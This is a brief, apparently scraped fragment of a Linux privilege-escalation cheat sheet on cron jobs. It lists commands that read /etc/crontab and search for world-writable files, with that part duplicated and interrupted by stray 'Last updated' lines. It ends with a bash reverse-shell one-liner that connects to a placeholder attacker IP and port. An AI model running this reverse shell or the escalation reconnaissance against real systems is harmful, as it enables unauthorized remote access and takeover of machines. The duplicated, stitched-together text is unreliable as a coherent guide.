crontab
cat /etc/crontab
# And
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null


Last updated
cat /etc/crontab
# And
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null


Last updated
bash -c 'bash -i >& /dev/tcp/AttackerIP/portnumber 0>&1'